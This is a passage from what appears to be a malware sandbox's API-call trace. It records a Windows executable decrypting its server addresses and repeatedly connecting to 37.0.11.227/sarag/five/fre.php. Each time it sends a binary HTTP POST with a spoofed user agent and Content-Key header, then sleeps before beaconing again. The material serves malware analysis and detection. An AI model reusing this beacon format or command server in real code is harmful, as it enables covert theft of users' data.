dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0320.291] GetProcessHeap () returned 0x690000 [0320.291] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0320.291] GetProcessHeap () returned 0x690000 [0320.292] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0320.293] GetProcessHeap () returned 0x690000 [0320.293] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0320.294] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1838) returned 0xaf0 [0320.295] Sleep (dwMilliseconds=0xea60) [0320.296] GetProcessHeap () returned 0x690000 [0320.296] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0320.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.297] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.306] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0320.314] GetProcessHeap () returned 0x690000 [0320.314] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0320.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.316] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0320.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.317] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.317] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.317] GetProcessHeap () returned 0x690000 [0320.318] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0320.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.319] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0320.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.320] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0320.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.320] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0320.320] GetProcessHeap () returned 0x690000 [0320.320] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0320.321] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.321] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0320.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.322] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0320.323] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.323] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0320.324] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.324] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0320.324] GetProcessHeap () returned 0x690000 [0320.324] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0320.324] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0320.324] GetProcessHeap () returned 0x690000 [0320.325] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0320.325] GetProcessHeap () returned 0x690000 [0320.325] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0320.325] GetProcessHeap () returned 0x690000 [0320.326] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0320.326] GetProcessHeap () returned 0x690000 [0320.326] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0320.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.326] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.331] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0320.339] GetProcessHeap () returned 0x690000 [0320.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0320.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.340] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0320.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.341] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.342] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.342] GetProcessHeap () returned 0x690000 [0320.342] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0320.343] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.343] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0320.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.348] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0320.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.349] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0320.349] GetProcessHeap () returned 0x690000 [0320.349] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0320.349] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.350] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0320.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.350] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0320.351] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.351] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0320.352] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.352] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0320.352] GetProcessHeap () returned 0x690000 [0320.352] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0320.352] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0320.352] GetProcessHeap () returned 0x690000 [0320.352] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0320.352] socket (af=2, type=1, protocol=6) returned 0xaf4 [0320.352] connect (s=0xaf4, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0320.430] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0320.430] GetProcessHeap () returned 0x690000 [0320.430] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0320.430] GetProcessHeap () returned 0x690000 [0320.430] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0320.430] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0320.431] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0320.431] GetProcessHeap () returned 0x690000 [0320.431] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0320.431] GetProcessHeap () returned 0x690000 [0320.432] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0320.432] GetProcessHeap () returned 0x690000 [0320.432] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0320.433] GetProcessHeap () returned 0x690000 [0320.433] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0320.433] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0320.434] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0320.434] GetProcessHeap () returned 0x690000 [0320.434] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0320.434] GetProcessHeap () returned 0x690000 [0320.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0320.435] send (s=0xaf4, buf=0x6ad508*, len=242, flags=0) returned 242 [0320.436] send (s=0xaf4, buf=0x6aba40*, len=159, flags=0) returned 159 [0320.436] GetProcessHeap () returned 0x690000 [0320.436] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0320.436] recv (in: s=0xaf4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0320.622] GetProcessHeap () returned 0x690000 [0320.622] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0320.622] GetProcessHeap () returned 0x690000 [0320.623] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0320.623] GetProcessHeap () returned 0x690000 [0320.623] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0320.623] GetProcessHeap () returned 0x690000 [0320.623] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0320.623] closesocket (s=0xaf4) returned 0 [0320.624] GetProcessHeap () returned 0x690000 [0320.624] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0320.624] GetProcessHeap () returned 0x690000 [0320.624] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0320.625] GetProcessHeap () returned 0x690000 [0320.625] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0320.625] GetProcessHeap () returned 0x690000 [0320.625] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0320.625] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1840) returned 0xaf4 [0320.628] Sleep (dwMilliseconds=0xea60) [0320.632] GetProcessHeap () returned 0x690000 [0320.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0320.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.633] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.640] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0320.771] GetProcessHeap () returned 0x690000 [0320.771] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0320.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.773] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0320.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.774] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.855] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.855] GetProcessHeap () returned 0x690000 [0320.856] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0320.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.857] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0320.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.858] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0320.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.858] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0320.858] GetProcessHeap () returned 0x690000 [0320.858] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0320.859] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.859] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0320.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.860] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0320.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.861] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0320.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.862] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0320.862] GetProcessHeap () returned 0x690000 [0320.862] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0320.862] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0320.863] GetProcessHeap () returned 0x690000 [0320.863] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0320.863] GetProcessHeap () returned 0x690000 [0320.864] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0320.864] GetProcessHeap () returned 0x690000 [0320.864] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0320.864] GetProcessHeap () returned 0x690000 [0320.864] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0320.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.865] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.871] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0320.877] GetProcessHeap () returned 0x690000 [0320.877] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0320.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.878] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0320.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.879] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.880] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.880] GetProcessHeap () returned 0x690000 [0320.881] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0320.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.881] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0320.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.882] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0320.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0320.883] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0320.883] GetProcessHeap () returned 0x690000 [0320.883] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0320.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.885] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0320.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.886] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0320.887] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.887] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0320.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0320.888] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0320.888] GetProcessHeap () returned 0x690000 [0320.888] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0320.888] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0320.888] GetProcessHeap () returned 0x690000 [0320.888] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0320.888] socket (af=2, type=1, protocol=6) returned 0xaf8 [0320.889] connect (s=0xaf8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0320.912] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0320.912] GetProcessHeap () returned 0x690000 [0320.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0320.912] GetProcessHeap () returned 0x690000 [0320.912] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0320.913] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0320.914] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0320.914] GetProcessHeap () returned 0x690000 [0320.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0320.914] GetProcessHeap () returned 0x690000 [0320.914] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0320.914] GetProcessHeap () returned 0x690000 [0320.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0320.914] GetProcessHeap () returned 0x690000 [0320.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0320.915] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0320.916] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0320.916] GetProcessHeap () returned 0x690000 [0320.916] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0320.916] GetProcessHeap () returned 0x690000 [0320.916] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0320.916] send (s=0xaf8, buf=0x6ad508*, len=242, flags=0) returned 242 [0320.918] send (s=0xaf8, buf=0x6aba40*, len=159, flags=0) returned 159 [0320.918] GetProcessHeap () returned 0x690000 [0320.918] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0320.918] recv (in: s=0xaf8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0320.995] GetProcessHeap () returned 0x690000 [0320.996] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0320.996] GetProcessHeap () returned 0x690000 [0320.996] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0320.997] GetProcessHeap () returned 0x690000 [0320.997] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0320.997] GetProcessHeap () returned 0x690000 [0320.998] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0320.998] closesocket (s=0xaf8) returned 0 [0320.998] GetProcessHeap () returned 0x690000 [0320.998] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0320.999] GetProcessHeap () returned 0x690000 [0320.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0320.999] GetProcessHeap () returned 0x690000 [0320.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0321.000] GetProcessHeap () returned 0x690000 [0321.000] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0321.008] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1844) returned 0xaf8 [0321.012] Sleep (dwMilliseconds=0xea60) [0321.014] GetProcessHeap () returned 0x690000 [0321.014] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0321.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.015] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0321.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0321.019] 